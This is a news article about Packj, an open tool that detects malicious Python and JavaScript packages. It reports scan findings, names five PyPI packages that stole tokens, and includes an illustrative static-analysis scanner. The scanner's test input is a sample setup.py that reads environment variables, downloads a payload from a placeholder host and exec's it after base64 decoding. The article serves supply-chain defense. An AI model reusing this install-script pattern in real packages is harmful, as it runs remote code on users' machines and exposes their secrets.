Packj - a tool for detecting malicious libraries in Python and JavaScript

The developers of the Packj platform, which analyzes the security of libraries, have published an open command-line toolkit that can identify risky constructs in packages, i.e. constructs that may be associated with malicious activity or with vulnerabilities used to carry out attacks on the projects that depend on those packages ("supply chain" attacks). Checking is supported for Python and JavaScript packages hosted in the PyPi and NPM catalogs (support for Ruby and RubyGems is planned for this month). The toolkit is written in Python and distributed under the AGPLv3 license.

When 330 thousand packages in the PyPi repository were analyzed with the proposed tools, 42 malicious packages containing backdoors and 2.4 thousand risky packages were identified. During a check, static code analysis is performed to identify the API features used, and the presence of known vulnerabilities recorded in the OSV database is assessed. The MalOSS package is used for the API check. Package code is analyzed for typical patterns commonly found in malware; the patterns were prepared by studying 651 packages with confirmed malicious activity.

Features and metadata that raise the likelihood of abuse are also identified, such as executing code blocks via "eval" or "exec", generating new code at run time, using code obfuscation techniques, manipulating environment variables, unrestricted file access, downloading network resources from configuration scripts (setup.py), typosquatting (choosing names similar to those of popular libraries), signs of outdated or abandoned projects, non-existent e-mail addresses or websites listed in the metadata, and the absence of a public repository with the code.
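As an added illustration of the kind of static check described above (this is example code written for this page, not Packj's own implementation), the following AST scan flags three of the listed signals in a Python install script: dynamic code execution, environment-variable access, and network imports. The sample setup.py is constructed for the demonstration; the package name and URL in it are placeholders.

```python
import ast

# Signals drawn from the categories above: dynamic code execution,
# environment-variable access, and networking from an install script.
RISKY_CALLS = {"eval", "exec", "compile"}
NETWORK_MODULES = {"urllib", "urllib.request", "requests", "socket", "http.client"}

def scan_source(source: str) -> dict[str, list[int]]:
    """Return {signal: [line numbers]} for risky constructs found in `source`."""
    findings: dict[str, list[int]] = {}
    tree = ast.parse(source)

    def note(kind: str, node: ast.AST) -> None:
        findings.setdefault(kind, []).append(node.lineno)

    for node in ast.walk(tree):
        # eval(...) / exec(...) / compile(...) called by bare name
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) \
                and node.func.id in RISKY_CALLS:
            note("dynamic-exec", node)
        # os.environ / os.getenv attribute access
        elif isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name) \
                and node.value.id == "os" and node.attr in {"environ", "getenv"}:
            note("env-access", node)
        # import of a networking module (import X / from X import ...)
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in NETWORK_MODULES:
                    note("network-import", node)
        elif isinstance(node, ast.ImportFrom) and node.module in NETWORK_MODULES:
            note("network-import", node)
    return findings

# Constructed sample install script (placeholder name and URL, not a real package).
SAMPLE_SETUP_PY = '''\
import os
import base64
from urllib.request import urlopen
from setuptools import setup

secrets = dict(os.environ)
payload = urlopen("http://example.invalid/stage").read()
exec(base64.b64decode(payload))

setup(name="example-modules", version="0.1")
'''

if __name__ == "__main__":
    for kind, lines in sorted(scan_source(SAMPLE_SETUP_PY).items()):
        print(f"{kind}: lines {lines}")
```

A real scanner would also resolve aliased imports (`import os as o`) and attribute-style calls such as `builtins.exec`, which this minimal walk deliberately ignores.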

Separately, other security researchers have reported five malicious packages in the PyPi repository that sent the contents of environment variables to an external server with the aim of stealing tokens for AWS and continuous-integration systems: loglib-modules (presented as modules for the legitimate loglib library), pyg-modules, pygrata and pygrata-utils (passed off as add-ons to the legitimate pyg library), and hkg-sol-utils.

Source: opennet.ru
